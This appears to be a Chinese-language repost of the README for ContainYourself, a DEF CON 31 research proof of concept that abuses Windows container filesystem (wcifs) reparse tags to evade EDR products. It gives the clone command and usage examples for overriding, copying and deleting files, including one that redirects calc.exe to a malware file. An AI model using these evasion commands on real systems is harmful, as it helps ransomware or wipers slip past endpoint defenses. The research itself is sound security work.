ContainYourself：一款研究滥用 Windows 容器来绕过 EDR的框架

关于

DEF CON 31 中提出的 ContainYourself 研究的 POC，该研究滥用 Windows 容器框架来绕过 EDR

幻灯片： 

安装

确保克隆存储库及其子模块：

git clone --recursive git@github.com:deepinstinct/ContainYourself.git

用法

Usage: ContainYourselfPoc.exe [--command]

Valid commands:
        --set-reparse [override|link] - Set wcifs reparse tag
        --remove-reparse [override|link] - Remove wcifs reparse tag
        --override-file - override a file using wcifs
        --copy-file - Copy a file using wcifs
        --delete-file - Delete a file using wcifs
        --create-process - Create process from an image file path using NtCreateUserProcess
Commands arguments:
        --source-file  - operation full source file (relative to volume only when using with [--copy-file])
        --target-file  - operation target file (relative to volume)
        --source-volume  - operation source volume, without a trailing backslash (default is C:)
        --target-volume  - operation target volume, without a trailing backslash (default is C:)

Examples:
        ContainYourselfPoc.exe --set-reparse override --source-file C:\temp\calc.exe --target-file \temp\malware.exe
        ContainYourselfPoc.exe --remove-reparse --source-file C:\temp\calc.exe
        ContainYourselfPoc.exe --override-file --source-file C:\temp\calc.exe
        ContainYourselfPoc.exe --copy-file --source-file temp\document.docx --target-file Documents\document.docx --target-volume E:
        ContainYourselfPoc.exe --delete-file --source-file C:\temp\document.docx

免责声明

每个安全产品都能够整合其独特的算法，旨在对抗勒索软件和擦除器威胁。无法保证此概念验证将成功规避所有现有的可用保护解决方案。

项目地址

ContainYourself：【GitHub传送门】